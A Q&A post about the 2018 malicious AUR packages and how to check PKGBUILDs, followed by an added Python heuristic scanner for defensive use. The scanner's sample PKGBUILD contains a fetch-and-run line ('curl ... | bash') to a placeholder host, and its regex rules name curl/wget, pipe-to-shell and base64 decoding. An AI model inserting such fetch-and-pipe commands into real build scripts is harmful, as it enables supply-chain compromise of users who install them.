How to check an AUR package for malicious code?

4 votes
1 answer
3467 views
Malicious code was found in, and later deleted from, 3 AUR packages: acroread, blaz and minergate (e.g. acroread PKGBUILD detail). It was found in a commit released by a malicious user, who changed the owner of the orphaned AUR package and included a malicious curl command.

The curl command will download the main bash script x, then the second script u (u.sh), in order to create a systemd service and use a function to collect some system data (non-sensitive data), but the scripts can be modified by the attacker to be uploaded sequentially.

In practice, not all users have the ability to check the PKGBUILD before building any package on their systems, for some reasons (it requires some knowledge, takes more time, etc.). To understand how it works, I have downloaded and uploaded the 2 bash scripts on this pastebin page.

What is the easiest way to check an AUR package for malicious code?

Naked Security: Another Linux community with malware woes
Malicious Software Packages Found On Arch Linux User Repository
Asked by GAD3R (69486 rep)
Jul 15, 2018, 12:00 PM
Last activity: Sep 7, 2023, 02:47 PM
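
A heuristic pre-build scan for the pattern described in the question, as an added example that is not part of the original post or of any AUR tooling. It flags downloads a PKGBUILD or .install script performs itself, output piped into a shell, and systemd services touched at install time. The rule set and the sample PKGBUILD (with its example.invalid URLs) are constructed for illustration, and a clean result does not replace reading the file.

```python
import re

# Heuristic rules (assumptions of this example, not an official AUR check).
RULES = [
    ("network-fetch",
     re.compile(r"(?<![\w-])(curl|wget)\s+(-|[\"']?(\$|https?://))"),
     "download run by the script itself instead of being listed in source=()"),
    ("pipe-to-shell", re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "output piped straight into a shell"),
    ("service-control",
     re.compile(r"\bsystemctl\s+(enable|start|daemon-reload)\b"),
     "systemd unit enabled or started at build/install time"),
    ("obfuscation", re.compile(r"\beval\b|base64\s+(-d|--decode)"),
     "dynamic evaluation or decoding of hidden content"),
]

def logical_lines(text):
    """Yield (first_line_no, code) with backslash continuations joined
    and comments removed (naive: a ' #' inside quotes is also cut)."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        start = no if start is None else start
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        code = re.sub(r"(^|\s)#.*$", "", buf + line).strip()
        if code:
            yield start, code
        buf, start = "", None

def scan(text):
    """Return [(line_no, rule_id, reason)] for every rule a line triggers."""
    return [(no, rule_id, why)
            for no, code in logical_lines(text)
            for rule_id, pattern, why in RULES if pattern.search(code)]

# Constructed sample PKGBUILD; not the code from the real incident.
SAMPLE = '''\
pkgname=demo
pkgver=1.0
makedepends=(curl wget)
source=("https://example.invalid/demo-$pkgver.tar.gz")
# curl https://example.invalid/old | sh   (commented out)
package() {
  install -Dm755 demo "$pkgdir/usr/bin/demo"
  curl -s https://example.invalid/x \\
    | bash -&
}
'''
```

Run `scan()` over the PKGBUILD and any .install file in the cloned package directory before calling makepkg, and review every flagged line by hand.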